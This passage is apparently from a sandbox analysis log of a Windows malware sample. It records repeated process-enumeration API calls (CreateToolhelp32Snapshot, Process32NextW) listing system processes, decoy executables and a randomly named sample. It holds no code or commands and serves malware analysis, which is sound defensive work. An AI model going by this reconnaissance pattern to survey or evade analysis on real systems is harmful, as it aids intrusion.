th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.524] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.524] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.571] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.579] CloseHandle (hObject=0xc4) returned 1 [0145.579] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.585] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.598] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.600] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.601] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.603] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.684] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.687] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.688] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.689] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.691] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.692] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.694] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.695] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.697] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.698] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.700] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.701] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.703] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 